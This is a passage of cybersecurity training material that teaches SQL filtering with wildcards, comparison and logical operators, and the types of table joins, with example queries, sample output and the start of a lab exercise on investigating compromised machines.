● a wildcard
● the LIKE operator
Wildcards
A wildcard is a special character that can be substituted with any other character. Two of the most useful
wildcards are the percentage sign (%) and the underscore (_):
● The percentage sign substitutes for any number of other characters.
● The underscore symbol only substitutes for one other character.
These wildcards can be placed after a string, before a string, or in both locations depending on the
pattern you’re filtering for.
The following table includes these wildcards applied to the string 'a' and examples of what each pattern
would return.
Pattern   Results that could be returned
'a%'      apple123, art, a
'a_'      as, an, a7
'a__'     ant, add, a1c
'%a'      pizza, Z6ra, a
'_a'      ma, 1a, Ha
'%a%'     Again, back, a
'_a_'     Car, ban, ea7
LIKE
To apply wildcards to the filter, you need to use the LIKE operator instead of an equals sign (=). LIKE is
used with WHERE to search for a pattern in a column.
For instance, if you want to email employees with a title of either 'IT Staff' or 'IT Manager', you can use
the LIKE operator combined with the % wildcard:
SELECT lastname, firstname, title, email
FROM employees
WHERE title LIKE 'IT%';
This query returns all records with values in the title column that start with the pattern of 'IT'. This
means both 'IT Staff' and 'IT Manager' are returned.
As another example, if you want to search through the invoices table to find all customers located in
states with an abbreviation of 'NY', 'NV', 'NS' or 'NT', you can use the 'N_' pattern on the state column:
SELECT *
FROM invoices
WHERE billingstate LIKE 'N_';
This returns all the records with state abbreviations that follow this pattern.
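To see the difference between the two wildcards concretely, here is a small sqlite3 sketch; the invoices table and its state abbreviations are made up for illustration:

```python
import sqlite3

# Hypothetical invoices table holding state abbreviations.
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE invoices (billingstate TEXT)")
con.executemany("INSERT INTO invoices VALUES (?)",
                [("NY",), ("NV",), ("CA",), ("N",), ("NSW",)])

# '_' substitutes for exactly one character: 'N_' matches 'NY' and 'NV',
# but not 'N' (too short) or 'NSW' (too long).
one_char = con.execute(
    "SELECT billingstate FROM invoices WHERE billingstate LIKE 'N_'").fetchall()

# '%' substitutes for any number of characters (including zero),
# so 'N%' also matches 'N' and 'NSW'.
any_chars = con.execute(
    "SELECT billingstate FROM invoices WHERE billingstate LIKE 'N%'").fetchall()
print(one_char, any_chars)
```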
Key takeaways
Filters are important when refining what your query returns. WHERE is an essential keyword for adding
a filter to your query. You can also filter for patterns by combining the LIKE operator with the
percentage sign (%) and the underscore (_) wildcards.
Filter Dates and Numbers
In this video, we're going to continue using SQL queries and filters, but now we're going to apply
them to new data types. First, let's explore the three common data types that you will find in
databases: string, numeric, and date and time. String data is data consisting of an ordered sequence
of characters. These characters could be numbers, letters, or symbols. For example, you'll encounter
string data in user names, such as analyst10. Numeric data is data consisting of
numbers, such as a count of log-in attempts. Unlike strings, mathematical operations can be used on
numeric data, like multiplication or addition. Date and time data refers to data representing a date
and/or time. Previously, we applied filters using string data, but now let's work with numeric and
date and time data. As a security analyst, you'll often need to query numbers and dates. For
example, we could filter patch dates to find machines that need an update, or we could filter log-in
attempts to return only those made in a certain period. We learned about operators in the last
video, and we're going to use them again for numbers and dates. Common operators for working
with numeric or date and time data types include: equals, greater than, less than, not equal to,
greater than or equal to, and less than or equal to. Let's say you want to find the log-in attempts
made after 6 pm. Because this is past normal business hours, you want to look for suspicious
patterns. You can identify these attempts by using the greater than operator in your filter. We'll
start writing our query in SQL. We begin by indicating that we want to select all columns FROM the
log_in_attempts table. Then we'll add our filter with WHERE. Our condition indicates that the value
in the time column must be greater than, or for dates and times, later than '18:00', which is how 6
pm is written in SQL. Let's run this and examine the output. Perfect! Now we have a list of log-in
attempts made after 6 pm. We can also filter for numbers and dates by using the BETWEEN
operator. BETWEEN is an operator that filters for numbers or dates within a range. An example of
this would be when looking for all patches installed within a certain range. Let's do this! Let's find
all
the patches installed between March 1st, 2021 and September 1st, 2021. In our query, we start with
selecting all records FROM the machines table. And we add the BETWEEN operator
in the WHERE statement. Let's break down the statement. First, after WHERE, we indicate
which column to filter, in our case, OS_patch_date. Next, comes our operator BETWEEN. We then
add the beginning of our range, type AND, then finish by adding the end of our range and a
semicolon. Now, let's run this and explore the output. And now we have a list of all machines
patched between those two dates! Before we wrap up, an important thing to note is that when we
filter for strings, dates, and times, we use quotation marks to specify what we're looking for.
However, for numbers, we don't use quotation marks. With this new knowledge, you're now ready
to work on all sorts of interesting filters for numbers and dates.
Operators for filtering dates and numbers
Previously, you examined operators like less than (<) or greater than (>) and explored how they can be
used in filtering numeric and date and time data types. This reading summarizes what you learned and
provides new examples of using operators in filters.
Numbers, dates, and times in cybersecurity
Security analysts work with more than just string data, or data consisting of an ordered sequence of
characters.
They also frequently work with numeric data, or data consisting of numbers. A few examples of numeric
data that you might encounter in your work as a security analyst include:
● the number of login attempts
● the count of a specific type of log entry
● the volume of data being sent from a source
● the volume of data being sent to a destination
You'll also encounter date and time data, or data representing a date and/or time. As a first example, logs
will generally timestamp every record. Other time and date data might include:
● login dates
● login times
● dates for patches
● the duration of a connection
Comparison operators
In SQL, filtering numeric and date and time data often involves operators. You can use the following
operators in your filters to make sure you return only the rows you need:
Operator   Use
<          less than
>          greater than
=          equal to
<=         less than or equal to
>=         greater than or equal to
<>         not equal to
Note: You can also use != as an alternative operator for not equal to.
Incorporating operators into filters
These comparison operators are used in the WHERE clause at the end of a query. The following query
uses the > operator to filter the birthdate column. You can run this query to explore its output:
SELECT firstname, lastname
FROM employees
WHERE birthdate > '1970-01-01';
This query returns the first and last names of employees born after, but not on, '1970-01-01' (or January
1, 1970). If you were to use the >= operator instead, the results would also include results on exactly
'1970-01-01'.
In other words, the > operator is exclusive and the >= operator is inclusive. An exclusive operator is an
operator that does not include the value of comparison. An inclusive operator is an operator that
includes the value of comparison.
BETWEEN
Another operator used for numeric data as well as date and time data is the BETWEEN operator.
BETWEEN filters for numbers or dates within a range. For example, if you want to find the first and last
names of all employees hired between January 1, 2002 and January 1, 2003, you can use the BETWEEN
operator as follows:
SELECT firstname, lastname
FROM employees
WHERE hiredate BETWEEN '2002-01-01' AND '2003-01-01';
Note: The BETWEEN operator is inclusive. This means records with a hiredate of January 1, 2002 or
January 1, 2003 are included in the results of the previous query.
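A minimal sqlite3 sketch with invented hire dates illustrates the exclusive/inclusive distinction (SQLite compares ISO-formatted date strings lexically, which matches chronological order):

```python
import sqlite3

# Hypothetical employees table with ISO-format hire dates.
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE employees (lastname TEXT, hiredate TEXT)")
con.executemany("INSERT INTO employees VALUES (?, ?)", [
    ("Adams", "2002-01-01"),
    ("Baker", "2002-08-14"),
    ("Chen", "2003-01-01"),
    ("Diaz", "2004-03-04"),
])

# > is exclusive: only hires strictly after 2002-01-01 are returned.
after = con.execute(
    "SELECT lastname FROM employees WHERE hiredate > '2002-01-01'").fetchall()

# BETWEEN is inclusive: records on both endpoint dates are returned.
in_range = con.execute(
    "SELECT lastname FROM employees "
    "WHERE hiredate BETWEEN '2002-01-01' AND '2003-01-01'").fetchall()
print(after, in_range)
```

Note that Adams (hired exactly on the lower endpoint) is excluded by > but included by BETWEEN.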
Key takeaways
Operators are important when filtering numeric and date and time data. These include exclusive
operators such as < and inclusive operators such as <=. The BETWEEN operator, another inclusive
operator, helps you return the data you need within a range.
Activity overview
As a security analyst, you’ll often need to query numbers and dates.
For example, you may need to filter patch dates to find machines that need an update. Or
you might filter login attempts made during a certain period to investigate a security
incident.
Common operators for working with numeric or date and time data will help you
accurately filter data. These are some of the operators you'll use:
● = (equal)
● > (greater than)
● < (less than)
● <> (not equal to)
● >= (greater than or equal to)
● <= (less than or equal to)
Filters with AND, OR, and NOT
In the previous lesson, we learned about even more ways to filter queries in SQL to work with some
typical security analyst tasks. However, when working with real security questions, we often have
to filter for multiple conditions. Vulnerabilities, for instance, might depend on more than one factor.
For example, a security vulnerability might be related to machines using a specific email client on a
specific operating system. So, to find the possible vulnerabilities, we need to find machines using
both the email client and the operating system. To make a query with multiple conditions that must
be met, we use the AND operator between
two separate conditions. AND is an operator that specifies that both conditions must
be met simultaneously. Bringing this back to our fruit and vegetable analogy, this is the same as
asking someone to select apples from the big box where the
apples are large and fresh. This means our results won't
include any small apples even if they're fresh, or any rotten apples even
if they're large. They'll only include large fresh apples. The apples must meet
both conditions. Going back to our database, the machines table lists all operating systems
and email clients. We want a list of machines running Operating System 1 and a list of machines
using Email Client 1. We'll use the left and right circles in the Venn diagram to represent these
groups. We need SQL to select the machines that have both OS 1 and Email Client 1. The filled-in
area at the intersection of these circles represents this condition. Let's take this and implement it in
SQL. First, we're going to start by building the first
lines of the query, telling SQL to SELECT * (all columns) FROM the
machines table. Then, we'll add the WHERE clause. Let's examine this more closely. First, we
indicate the first condition that it must meet: that the operating system
column has a value of 'OS 1'. Then, we use AND to join this to another condition. And finally, we
enter the other condition, in this case that the email client column should have a value of 'Email
Client 1'. And this is how you use the AND operator in SQL! Let's run this to get the query results.
Perfect! All the results match both our conditions! Let's keep going and explore more ways to
combine different conditions by working with the OR operator. The OR operator is an operator that
specifies that either condition can be met. In a Venn diagram, let's say each circle represents a
condition. When they are joined with OR, SQL would select all rows that satisfy one of the
conditions. And it's also ok if it meets both conditions. Let's run another query and use the OR
operator. Let's say that we wanted the filter to identify
machines that have either OS 1 or OS 3 because both types need a patch. We'll type in these
conditions. Let's examine this more closely. After WHERE, our first condition indicates we want to
filter so that the query selects machines with 'OS 1'. We use the OR operator because we also want
to find records that match another condition. This additional condition is placed after OR and
indicates to also select machines running 'OS 3'. Executing the query, our results now include
records that have a value of either OS 1 or OS 3 in the operating system column. Good job, we're
running
some complex queries. The last operator we're going to go into is the NOT operator. NOT negates a
condition. In a diagram, we can show this by selecting every entry that does
not match our condition. The condition is
represented by the circle. The filled-in portion outside the circle represents
what gets returned. This is all data that does
not match the condition. For example, when picking out fruit, you can be looking for any
fruit that is not an apple. That is a lot more efficient than telling your friend you want a banana or
an orange or a lime, and so on. Suppose you wanted to update all of the devices in your company
except for the ones using OS 3. Bringing this into SQL, we can write this query. We place NOT after
WHERE and before the condition of the filter. Executing these queries gives us the list of all the
machines that aren't running OS 3, and now we know which machines to update. That was a lot of
new content that we just looked into, but you're learning more
and more SQL that you can use on your journey to become an analyst! In the next video, we'll be
learning how to combine and join two tables together to expand the kinds of queries we can
run. I'll meet you there!
More on filters with AND, OR, and NOT
Previously, you explored how to add filters containing the AND, OR, and NOT operators to
your SQL queries. In this reading, you'll continue to explore how these operators can help
you refine your queries.
Logical operators
AND, OR, and NOT allow you to filter your queries to return the specific information that
will help you in your work as a security analyst. They are all considered logical operators.
AND
First, AND is used to filter on two conditions. AND specifies that both conditions must be
met simultaneously.
As an example, a cybersecurity concern might affect only those customer accounts that
meet both the condition of being handled by a support representative with an ID of 5 and
the condition of being located in the USA. To find the names and emails of those specific
customers, you should place the two conditions on either side of the AND operator in the
WHERE clause:
SELECT firstname, lastname, email, country, supportrepid
FROM customers
WHERE supportrepid = 5 AND country = 'USA';

+-----------+----------+-------------------------+---------+--------------+
| FirstName | LastName | Email                   | Country | SupportRepId |
+-----------+----------+-------------------------+---------+--------------+
| Jack      | Smith    | jacksmith@microsoft.com | USA     |            5 |
| Kathy     | Chase    | kachase@hotmail.com     | USA     |            5 |
| Victor    | Stevens  | vstevens@yahoo.com      | USA     |            5 |
| Julia     | Barnett  | jubarnett@gmail.com     | USA     |            5 |
+-----------+----------+-------------------------+---------+--------------+
Running this query returns four rows of information about the customers. You can use this
information to contact them about the security concern.
OR
The OR operator also connects two conditions, but OR specifies that either condition can be
met. It returns results where the first condition, the second condition, or both are met.
For example, if you are responsible for finding all customers who are either in the USA or
Canada so that you can communicate information about a security update, you can use an
OR operator to find all the needed records. As the following query demonstrates, you
should place the two conditions on either side of the OR operator in the WHERE clause:
SELECT firstname, lastname, email, country
FROM customers
WHERE country = 'Canada' OR country = 'USA';

+-----------+------------+--------------------------+---------+
| FirstName | LastName   | Email                    | Country |
+-----------+------------+--------------------------+---------+
| François  | Tremblay   | ftremblay@gmail.com      | Canada  |
| Mark      | Philips    | mphilips12@shaw.ca       | Canada  |
| Jennifer  | Peterson   | jenniferp@rogers.ca      | Canada  |
| Frank     | Harris     | fharris@google.com       | USA     |
| Jack      | Smith      | jacksmith@microsoft.com  | USA     |
| Michelle  | Brooks     | michelleb@aol.com        | USA     |
| Tim       | Goyer      | tgoyer@apple.com         | USA     |
| Dan       | Miller     | dmiller@comcast.com      | USA     |
| Kathy     | Chase      | kachase@hotmail.com      | USA     |
| Heather   | Leacock    | hleacock@gmail.com       | USA     |
| John      | Gordon     | johngordon22@yahoo.com   | USA     |
| Frank     | Ralston    | fralston@gmail.com       | USA     |
| Victor    | Stevens    | vstevens@yahoo.com       | USA     |
| Richard   | Cunningham | ricunningham@hotmail.com | USA     |
| Patrick   | Gray       | patrick.gray@aol.com     | USA     |
| Julia     | Barnett    | jubarnett@gmail.com      | USA     |
| Robert    | Brown      | robbrown@shaw.ca         | Canada  |
| Edward    | Francis    | edfrancis@yachoo.ca      | Canada  |
| Martha    | Silk       | marthasilk@gmail.com     | Canada  |
| Aaron     | Mitchell   | aaronmitchell@yahoo.ca   | Canada  |
| Ellie     | Sullivan   | ellie.sullivan@shaw.ca   | Canada  |
+-----------+------------+--------------------------+---------+
The query returns all customers in either the US or Canada.
Note: Even if both conditions are based on the same column, you need to write out both full
conditions. For instance, the query in the previous example contains the filter WHERE
country = 'Canada' OR country = 'USA'.
NOT
Unlike the previous two operators, the NOT operator only works on a single condition, and
not on multiple ones. The NOT operator negates a condition. This means that SQL returns
all records that don’t match the condition specified in the query.
For example, if a cybersecurity issue doesn't affect customers in the USA but might affect
those in other countries, you can return all customers who are not in the USA. This would
be more efficient than creating individual conditions for all of the other countries. To use
the NOT operator for this task, write the following query and place NOT directly after
WHERE:
SELECT firstname, lastname, email, country
FROM customers
WHERE NOT country = 'USA';

+-----------+-------------+-------------------------------+----------------+
| FirstName | LastName    | Email                         | Country        |
+-----------+-------------+-------------------------------+----------------+
| Luís      | Gonçalves   | luisg@embraer.com.br          | Brazil         |
| Leonie    | Köhler      | leonekohler@surfeu.de         | Germany        |
| François  | Tremblay    | ftremblay@gmail.com           | Canada         |
| Bjørn     | Hansen      | bjorn.hansen@yahoo.no         | Norway         |
| František | Wichterlová | frantisekw@jetbrains.com      | Czech Republic |
| Helena    | Holý        | hholy@gmail.com               | Czech Republic |
| Astrid    | Gruber      | astrid.gruber@apple.at        | Austria        |
| Daan      | Peeters     | daan_peeters@apple.be         | Belgium        |
| Kara      | Nielsen     | kara.nielsen@jubii.dk         | Denmark        |
| Eduardo   | Martins     | eduardo@woodstock.com.br      | Brazil         |
| Alexandre | Rocha       | alero@uol.com.br              | Brazil         |
| Roberto   | Almeida     | roberto.almeida@riotur.gov.br | Brazil         |
| Fernanda  | Ramos       | fernadaramos4@uol.com.br      | Brazil         |
| Mark      | Philips     | mphilips12@shaw.ca            | Canada         |
| Jennifer  | Peterson    | jenniferp@rogers.ca           | Canada         |
| Robert    | Brown       | robbrown@shaw.ca              | Canada         |
| Edward    | Francis     | edfrancis@yachoo.ca           | Canada         |
| Martha    | Silk        | marthasilk@gmail.com          | Canada         |
| Aaron     | Mitchell    | aaronmitchell@yahoo.ca        | Canada         |
| Ellie     | Sullivan    | ellie.sullivan@shaw.ca        | Canada         |
| João      | Fernandes   | jfernandes@yahoo.pt           | Portugal       |
| Madalena  | Sampaio     | masampaio@sapo.pt             | Portugal       |
| Hannah    | Schneider   | hannah.schneider@yahoo.de     | Germany        |
| Fynn      | Zimmermann  | fzimmermann@yahoo.de          | Germany        |
| Niklas    | Schröder    | nschroder@surfeu.de           | Germany        |
+-----------+-------------+-------------------------------+----------------+
(Output limit exceeded, 25 of 46 total rows shown)
SQL returns every entry where the customers are not from the USA.
Pro tip: Another way of finding values that are not equal to a certain value is by using the
<> operator or the != operator. For example, WHERE country <> 'USA' and WHERE country
!= 'USA' are the same filters as WHERE NOT country = 'USA'.
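The equivalence of these three filters can be checked with a quick script. The following is a minimal sketch using Python's built-in sqlite3 module and a small, hypothetical three-row customers table (not the full table from the examples above):

```python
import sqlite3

# Build a small, hypothetical customers table to test the filters on.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE customers (firstname TEXT, country TEXT)")
conn.executemany(
    "INSERT INTO customers VALUES (?, ?)",
    [("Luís", "Brazil"), ("Mark", "USA"), ("Leonie", "Germany")],
)

# All three filters should exclude the USA row and return the same names.
filters = ["NOT country = 'USA'", "country <> 'USA'", "country != 'USA'"]
results = [
    conn.execute(f"SELECT firstname FROM customers WHERE {f}").fetchall()
    for f in filters
]
assert results[0] == results[1] == results[2] == [("Luís",), ("Leonie",)]
```

Running this confirms that NOT, <>, and != produce identical result sets on this table.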
Combining logical operators
Logical operators can be combined in filters. For example, if you know that both the USA
and Canada are not affected by a cybersecurity issue, you can combine operators to return
customers in all countries besides these two. In the following query, NOT is placed before
the first condition, it's joined to a second condition with AND, and then NOT is also placed
before that second condition. You can run it to explore what it returns:
SELECT firstname, lastname, email, country
FROM customers
WHERE NOT country = 'Canada' AND NOT country = 'USA';
+-----------+-------------+-------------------------------+----------------+
| FirstName | LastName    | Email                         | Country        |
+-----------+-------------+-------------------------------+----------------+
| Luís      | Gonçalves   | luisg@embraer.com.br          | Brazil         |
| Leonie    | Köhler      | leonekohler@surfeu.de         | Germany        |
| Bjørn     | Hansen      | bjorn.hansen@yahoo.no         | Norway         |
| František | Wichterlová | frantisekw@jetbrains.com      | Czech Republic |
| Helena    | Holý        | hholy@gmail.com               | Czech Republic |
| Astrid    | Gruber      | astrid.gruber@apple.at        | Austria        |
| Daan      | Peeters     | daan_peeters@apple.be         | Belgium        |
| Kara      | Nielsen     | kara.nielsen@jubii.dk         | Denmark        |
| Eduardo   | Martins     | eduardo@woodstock.com.br      | Brazil         |
| Alexandre | Rocha       | alero@uol.com.br              | Brazil         |
| Roberto   | Almeida     | roberto.almeida@riotur.gov.br | Brazil         |
| Fernanda  | Ramos       | fernadaramos4@uol.com.br      | Brazil         |
| João      | Fernandes   | jfernandes@yahoo.pt           | Portugal       |
| Madalena  | Sampaio     | masampaio@sapo.pt             | Portugal       |
| Hannah    | Schneider   | hannah.schneider@yahoo.de     | Germany        |
| Fynn      | Zimmermann  | fzimmermann@yahoo.de          | Germany        |
| Niklas    | Schröder    | nschroder@surfeu.de           | Germany        |
| Camille   | Bernard     | camille.bernard@yahoo.fr      | France         |
| Dominique | Lefebvre    | dominiquelefebvre@gmail.com   | France         |
| Marc      | Dubois      | marc.dubois@hotmail.com       | France         |
| Wyatt     | Girard      | wyatt.girard@yahoo.fr         | France         |
| Isabelle  | Mercier     | isabelle_mercier@apple.fr     | France         |
| Terhi     | Hämäläinen  | terhi.hamalainen@apple.fi     | Finland        |
| Ladislav  | Kovács      | ladislav_kovacs@apple.hu      | Hungary        |
| Hugh      | O'Reilly    | hughoreilly@apple.ie          | Ireland        |
+-----------+-------------+-------------------------------+----------------+
(Output limit exceeded, 25 of 38 total rows shown)
Key takeaways
Logical operators allow you to create more specific filters that target the security-related
information you need. The AND operator requires two conditions to be true
simultaneously, the OR operator requires either one or both conditions to be true, and the
NOT operator negates a condition. Logical operators can be combined together to create
even more specific queries.
Join Tables in SQL
The last concept we're introducing in this section is joining tables
when querying a database. This is helpful when you need information from two different
tables in a database. Let's say we have two tables: one that tells us about security
vulnerabilities of different operating systems, and one about different machines
in our company, including their operating systems. Having the ability
to combine them gives us a list of vulnerable machines. That's pretty cool, right? First, let's
start talking about the syntax of joins. Since we're working with two tables now, we need a
way to tell SQL what table we're picking columns from. In our example database, we have
an employee_id column in both the employees table and the machines table. In SQL
statements that reference both tables, SQL needs to know which table's column we're referring to.
The way to resolve this is by writing the name of the table first, then a period, and then
the name of a column. So, we would have employees followed by a period, followed by the
column name. This is the employee_id column for the employees table. Similarly, this is the
employee_id column for the machines table. Now that we understand
this syntax, let's apply it to a join! Imagine that we want to get a deeper understanding of
the employees accessing the machines in our company. By joining the employees and the
machines tables, we can do this! We first need to identify the shared column that we'll use
to connect the two tables. In this case, we'll use the primary key in one table to connect to
another table where it's a foreign key. The primary key of the employees table is
employee_id, which is a foreign key in the machines table. employee_id is a primary key in
the employees table because it has a unique value for every row in the employees table,
and no empty values. We don't have a guarantee that the employee_id column in the
machines table follows the same criteria since it's a foreign key and not a primary key.
Next, we'll use a type of join called an INNER JOIN. An INNER JOIN returns rows matching on
a specified column that exists in more than one table. Tables usually contain many more
rows, but to further explain what we mean by INNER JOIN, let's focus on just four rows
from the employees table and four rows from the machines table. We'll also look at just a
few columns of each table for this example. Let's say we choose employee_id in both tables
to perform an INNER JOIN. Let's look at the two rows
where there is a match. Both tables have 1188 and 1189 in their respective employee_id
columns, so they are considered a match. The result of the join is the two rows that have
1188 and 1189 and all columns from both tables. Before we move on to the queries, we
must talk about the NULL values in the tables. In SQL, NULL represents a missing value due
to any reason. In this case, this might be machines that are not assigned to any employee.
Now, let's bring this into SQL and do an INNER JOIN on the full tables. Let's imagine we
want to join these tables to get a list of users and their office location that also shows what
operating system they use on their machines. employee_id is a common column between
these tables, and we can use this to join them. But we won't need to show this column in
the results. First, let's start with a basic query that indicates we want to select the
username, office, and operating system columns. We want employees to be our first or left
table, so we'll use that in our FROM statement. Now, we write the part of the query that
tells SQL to join the machines table with the employees table. Let's break down this query.
INNER JOIN tells SQL to perform the INNER JOIN. Then, we name the second table we want
to combine with the first. This is called the right table. In this case, we want to join
machines with the employees table that was already identified after FROM. Lastly, we tell
SQL what column to base the join on. In our case, we're using the employee_id column.
Since we're using two tables, we have to identify the table and follow that with the column
name. So, we have employees.employee_id. And machines.employee_id. Let's review the
output. Perfect! We have now joined two tables. The results of our query display the
records that match on the employee_id column. Notice that these records contain columns
from both tables, but only the ones we've indicated through our SELECT statement.
In the previous video and exercises, we saw how inner joins can be useful by only returning
records that share a value in specified columns. However, in some situations, we might need
all of the entries from one or both of our tables. This is where we need to use outer joins.
There are three types of outer joins: LEFT JOIN, RIGHT JOIN, and FULL OUTER JOIN. Similar
to inner joins, outer joins combine two tables together; however, they don't necessarily
need a match between columns to return a row. Which rows are returned depends on the
type of join. LEFT JOIN returns all of the records of the first table, but only returns rows of
the second table that match on a specified column. Like we did in the previous video, let's
examine this type of join by looking at just four rows of two tables with a small number of
columns. Employees is the left
table, or the first table, and machines is the right table, or the second table. Let's join on
employee_id. There's a matching value in this column for two of the four records. When we
execute the join, SQL returns these rows with the matching value, all other rows from the
left table, and all columns from both tables. Records from the employees table that didn't
match but were returned through the LEFT JOIN contain NULL values in columns that came
from the machines table. Next, let's talk about right joins. RIGHT JOIN returns all of the
records of the second table but only returns rows from the first table that match
on a specified column. With a RIGHT JOIN on the previous example, the full result returns
matching rows from both, all the rows from the second table, and all the columns in both
tables. Where a value has no match in the other table, we are left with a NULL value. Last,
we'll discuss full outer joins. FULL OUTER JOIN returns all records from both tables. Using
our same example, a FULL OUTER JOIN returns all columns from all tables. If a row doesn't
have a value for a particular column, it returns NULL. For example, the machines table does
not have any rows with employee_id 1190, so the values for that row in the columns that
came from the machines table are NULL. To implement left joins, right joins, and full outer
joins in SQL, you use the same syntax structure as the INNER JOIN but use these keywords:
LEFT JOIN, RIGHT JOIN, and FULL OUTER JOIN. As a security analyst, you're not required to
know all of these from memory. Once you understand the type of join you need, you can
quickly search and find all the information you need to execute these queries. With this
information on joins, we've now covered some very important information you'll need as a
security
analyst using SQL.
Compare types of joins
Previously, you explored SQL joins and how to use them to join data from multiple tables when these
tables share a common column. You also examined how there are different types of joins, and each of
them returns different rows from the tables being joined. In this reading, you'll review these concepts
and more closely analyze the syntax needed for each type of join.
Inner joins
The first type of join that you might perform is an inner join. INNER JOIN returns rows matching on a
specified column that exists in more than one table.
It only returns the rows where there is a match, but like other types of joins, it returns all specified
columns from all joined tables. For example, if the query joins two tables with SELECT *, all columns in
both of the tables are returned.
Note: If a column exists in both of the tables, it is returned twice when SELECT * is used.
The syntax of an inner join
To write a query using INNER JOIN, you can use the following syntax:
SELECT *
FROM employees
INNER JOIN machines ON employees.device_id = machines.device_id;
You must specify the two tables to join by including the first or left table after FROM and the second or
right table after INNER JOIN.
After the name of the right table, use the ON keyword and the = operator to indicate the column you are
joining the tables on. It's important that you specify both the table and column names in this portion of
the join by placing a period (.) between the table and the column.
In addition to selecting all columns, you can select only certain columns. For example, if you only want
the join to return the username, operating_system, and device_id columns, you can write this query:
SELECT username, operating_system, employees.device_id
FROM employees
INNER JOIN machines ON employees.device_id = machines.device_id;
Note: In the example query, username and operating_system only appear in one of the two tables, so they
are written with just the column name. On the other hand, because device_id appears in both tables, it's
necessary to indicate which one to return by specifying both the table and column name
(employees.device_id).
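To see an inner join in action outside of the lab environment, here is a minimal sketch using Python's sqlite3 module. The miniature employees and machines tables below are hypothetical (the usernames and device IDs are invented for illustration), but the join syntax matches the reading:

```python
import sqlite3

# Hypothetical miniature versions of the employees and machines tables.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE employees (username TEXT, device_id TEXT)")
conn.execute("CREATE TABLE machines (device_id TEXT, operating_system TEXT)")
conn.executemany("INSERT INTO employees VALUES (?, ?)",
                 [("ahodges", "D101"), ("bsmith", "D102"), ("cgriffin", "D999")])
conn.executemany("INSERT INTO machines VALUES (?, ?)",
                 [("D101", "OS 1"), ("D102", "OS 2"), ("D103", "OS 3")])

# INNER JOIN keeps only rows whose device_id appears in both tables.
# device_id is qualified with a table name because it exists in both.
rows = conn.execute(
    "SELECT username, operating_system, employees.device_id "
    "FROM employees "
    "INNER JOIN machines ON employees.device_id = machines.device_id"
).fetchall()
assert sorted(rows) == [("ahodges", "OS 1", "D101"),
                        ("bsmith", "OS 2", "D102")]
```

Note that cgriffin (device D999) and machine D103 are dropped: neither has a match in the other table, which is exactly what an inner join does.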
Outer joins
Outer joins expand what is returned from a join. Each type of outer join returns all rows from either one
table or both tables.
Left joins
When joining two tables, LEFT JOIN returns all the records of the first table, but only returns rows of the
second table that match on a specified column.
The syntax for using LEFT JOIN is demonstrated in the following query:
SELECT *
FROM employees
LEFT JOIN machines ON employees.device_id = machines.device_id;
As with all joins, you should specify the first or left table as the table that comes after FROM and the
second or right table as the table that comes after LEFT JOIN. In the example query, because employees is
the left table, all of its records are returned. Only records that match on the device_id column are
returned from the right table, machines.
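The NULL-filling behavior of a left join can be demonstrated with the same sqlite3 approach. This sketch uses hypothetical data in which one employee has no matching machine; sqlite3 surfaces SQL NULL as Python's None:

```python
import sqlite3

# Hypothetical tables: employee cgriffin has no matching machine.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE employees (username TEXT, device_id TEXT)")
conn.execute("CREATE TABLE machines (device_id TEXT, operating_system TEXT)")
conn.executemany("INSERT INTO employees VALUES (?, ?)",
                 [("ahodges", "D101"), ("cgriffin", "D999")])
conn.execute("INSERT INTO machines VALUES ('D101', 'OS 1')")

# LEFT JOIN keeps every employees row; columns from machines come back
# as NULL (Python None) where no device_id match exists.
rows = conn.execute(
    "SELECT username, operating_system FROM employees "
    "LEFT JOIN machines ON employees.device_id = machines.device_id"
).fetchall()
assert sorted(rows) == [("ahodges", "OS 1"), ("cgriffin", None)]
```

Both employees are returned even though only one matched, which is the defining difference from the inner join.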
Right joins
When joining two tables, RIGHT JOIN returns all of the records of the second table, but only returns rows
from the first table that match on a specified column.
The following query demonstrates the syntax for RIGHT JOIN:
SELECT *
FROM employees
RIGHT JOIN machines ON employees.device_id = machines.device_id;
RIGHT JOIN has the same syntax as LEFT JOIN, with the only difference being the keyword RIGHT JOIN
instructs SQL to produce different output. The query returns all records from machines, which is the
second or right table. Only matching records are returned from employees, which is the first or left table.
Note: You can use LEFT JOIN and RIGHT JOIN and return the exact same results if you use the tables in
reverse order. The following RIGHT JOIN query returns the exact same result as the LEFT JOIN query
demonstrated in the previous section:
SELECT *
FROM machines
RIGHT JOIN employees ON employees.device_id = machines.device_id;
All that you have to do is switch the order of the tables that appear before and after the keyword used
for the join, and you will have swapped the left and right tables.
Full outer joins
FULL OUTER JOIN returns all records from both tables. You can think of it as a way of completely merging
two tables.
You can review the syntax for using FULL OUTER JOIN in the following query:
SELECT *
FROM employees
FULL OUTER JOIN machines ON employees.device_id = machines.device_id;
The results of a FULL OUTER JOIN query include all records from both tables. Similar to INNER JOIN, the
order of tables does not change the results of the query.
Key takeaways
When working in SQL, there are multiple ways to join tables. All joins return the records that match on a
specified column. INNER JOIN will return only these records. Outer joins also return all other records
from one or both of the tables. LEFT JOIN returns all records from the first or left table, RIGHT JOIN
returns all records from the second or right table, and FULL OUTER JOIN returns all records from both
tables.
Activity overview
As a security analyst, you’ll often find that you need data from more than one table.
Previously, you learned that a relational database is a structured database containing tables
that are related to each other.
SQL joins enable you to combine tables that contain a shared column. This is helpful when
you need to connect information that appears in different tables.
In this lab activity, you’ll use SQL joins to connect separate tables and retrieve needed
information.
Get ready to apply what you’ve learned and join some data!
Note: The terms row and record are used interchangeably.
Scenario
In this scenario, you’ll investigate a recent security incident that compromised some
machines.
You are responsible for getting the required information from the database for the
investigation.
Here’s how you’ll do this task: First, you’ll use an inner join to identify which employees are
using which machines. Second, you’ll use left and right joins to find machines that do not
belong to any specific user and users who do not have any specific machine assigned to
them. Finally, you’ll use an inner join to list all login attempts made by all employees.
You’re ready to join tables in SQL!
Task 1. Match employees to their machines
First, you must identify which employees are using which machines. The data is located in
the machines and employees tables.
You must use a SQL inner join to return the records you need based on a connecting
column. In the scenario, both tables include the device_id column, which you’ll use to
perform the join.
1. Run the following query to retrieve all records from the machines table:
SELECT *
FROM machines;
You’ll note that this query is not sufficient to perform the join and retrieve the information
you need.
2. Complete the query to perform an inner join between the machines and employees tables
on the device_id column. Replace X and Y with this column name:
SELECT *
FROM machines
INNER JOIN employees ON machines.X = employees.Y;
Note: Placing the employees table after INNER JOIN makes it the right table.
Note: If the output of the query is too wide for your shell, press the Open Linux Console button
